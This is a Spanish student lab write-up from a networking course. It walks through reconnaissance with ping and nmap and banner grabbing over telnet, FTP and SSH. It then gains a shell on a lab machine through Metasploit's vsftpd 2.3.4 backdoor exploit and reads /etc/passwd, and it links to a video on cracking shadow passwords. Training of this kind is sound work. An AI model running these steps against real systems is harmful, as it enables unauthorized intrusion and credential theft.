explotación sistema operativo

13
Miguel Ángel Marchal Barrera COLEGIO CIUDAD DE LOS MUCHACHOS SISTEMAS MICROINFORMÁTICOS Y REDES CURSO 2016/2017 EXPLOTACIÓN SISTEMA OPERATIVO

Upload: miguel-angel-marchal-barrera

Post on 12-Apr-2017

46 views

Category:

Technology


0 download

TRANSCRIPT

Page 1: Explotación sistema operativo

EXPLOTACIÓN SISTEMA OPERATIVO

Miguel Ángel Marchal Barrera

Colegio ciudad de los muchachos SISTEMAS MICROINFORMÁTICOS Y REDES CURSO 2016/2017

Page 2: Explotación sistema operativo

IDENTIFICACIÓN DEL OBJETIVO

Comprobar si tenemos acceso a la máquina que queremos atacarComando ping + dirección del interfaz de redAbrir el terminal de Kali-linuxIntroducir: ping 192.168.1.104 (es la dirección del equipo a atacar)

Si tenemos conectividad no se perderá ningún paquete enviado

Detectar los equipos activos de la redComando nmap –sP + dirección de redIntroducir: nmap –sP 192.168.1.0/24

Escanea la red en busca de los equipos que están funcionando en la LAN mostrando las MAC y las direcciones IP de cada equipo.

PÁGINA 1|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS

MAMB

MAMB

MAMB

Page 3: Explotación sistema operativo

ANÁLISIS DE PUERTOS Y SERVICIOSIdentificación de puertos que usa la máquinaComando nmap –sT -O + dirección del interfaz de redIntroducir: nmap –sT -O 192.168.1.104

Muestra los puertos que utilizan la máquina y la versión del sistema operativo

PÁGINA 2|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS

MAMB

Page 4: Explotación sistema operativo

Comprobar versiones de serviciosComando nmap –sT –sV dirección del interfaz de redIntroducir: nmap –sT –sV 192.168.1.104

Muestra puertos abiertos, servicios y versiones de éstos.

Comprobar versiones de servicios mediante comando telnetComando telnet + IP del interfaz de red + puerto abiertoIntroducir: telnet 192.168.1.104 21

Muestra la versión del servicio del puerto seleccionado para saber si es posible que exista alguna vulnerabilidad en la versión.

PÁGINA 3|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS

MAMB

MAMB

Page 5: Explotación sistema operativo

Conexión a través del servicio seleccionadoComando telnet, FTP y SSHAcceso con comando telnetComando telnet + IP interfaz de redIntroducir: telnet 192.168.1.104

Accedemos a la máquina y muestra el interfaz de texto pidiendo login desconocido.

Acceso con comando FTPComando ftp + IP interfaz de redIntroducir: ftp 192.168.1.104

Acceso mediante servicio ftp pidiendo contraseña desconocida.

Acceso con comando SSHComando ssh + IP interfaz de redIntroducir: ssh 192.168.1.104

Acceso mediante servicio ssh pidiendo contraseña desconocida.

PÁGINA 4|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS

MAMB

MAMB

MAMB

Page 6: Explotación sistema operativo

ANÁLISIS DE VULNERABILIDADESHerramienta metasploitIniciar la herramienta introduciendo: msfconsole

Comprobar los exploits de la versión que pueden hacer vulnerable el acceso por el servicioIntroducir comando: search ftp

Lista de exploits que podemos utilizar para acceder de modo remoto a la máquina que queremos atacar.

PÁGINA 5|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS

MAMB

MAMB

Page 7: Explotación sistema operativo

EXPLOTACIÓN DE VULNERABILIDADESLocalizamos el xploit preparado para atacar

Este exploit nos informa que es excelente para usar.

Para usar el xploitComando use + dirección del exploitIntroducir: use exploit/unix/ftp/vsftpd_234_backdoor

Comprobar la configuración de parámetrosComando show optionsIntroducir: show options

Se comprueba si se necesita alguna configuración adicional para usar el exploit, necesitaremos configurar el RHOST asignando la IP de la máquina atacada.RHOST: Remote Host.RPORT: Remote Port.

Configuración RHOSTComando set RHOST + dirección del interfaz de redIntroducir: set RHOST 192.168.1.104

PÁGINA 6|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS

MAMB

MAMB

MAMB

MAMB

Page 8: Explotación sistema operativo

Buscar payload disponible

Comando show payloadsIntroducir: show payloads

Muestra el disponible

Utilizar el payload disponibleComando set payload + payload disponibleIntroducir: set payload cmd/unix/interact

Acceder remotamente a la máquinaComando exploitIntroducior: exploit

Acceso permitido remoto a la máquina atacada.Con este último comando habremos accedido a la máquina finalmente, sin necesidad de login de ningún tipo y se podrá acceder a los directorios y archivos de manera transparante.

PÁGINA 7|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS

MAMB

MAMB

MAMB

Page 9: Explotación sistema operativo

POST-EXPLOTACIÓN DEL SISTEMAUso de comandos como si estuviéramos en la misma máquina.Comando ls

Directorios de la raíz de la máquina atacada.

PÁGINA 8|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS

MAMB

Page 10: Explotación sistema operativo

Obtención de contraseñaComando catIntroducir: cat etc/passwd

La estructura es:<nombre>,<password><uid>, <gid>,<descripción opcional> <carpeta>, <shell><nombre>: Nombre de usuario.<password>: Si es igual a “x” la contraseña está almacenada en /etc/shadow, si es igual a “!” el usuario está bloqueado y si es igual a “!!” no tiene contraseña.<uid>: Número de identificador, para root 0, para los demás un número entre 1 y 65535.<gid>: Grupo al que está asignado.<descripción opcional>: Descripción añadida al perfil de usuario.<carpeta>: Carpeta de inicio de usuario de cada usuario.<shell>: Intérprete de línea de comandos de Linux.

Con esto no descifraremos la contraseña, sólo veremos los usuarios configurados, ésta está alojada en etc/shadow y está encriptada, para

PÁGINA 9|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS

MAMB

Page 11: Explotación sistema operativo

ello existen herramientas y tutoriales paso a paso para descifrarlas, en este link se explica cómo.https://www.youtube.com/watch?v=DntHkcbq-wY

PÁGINA 10|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS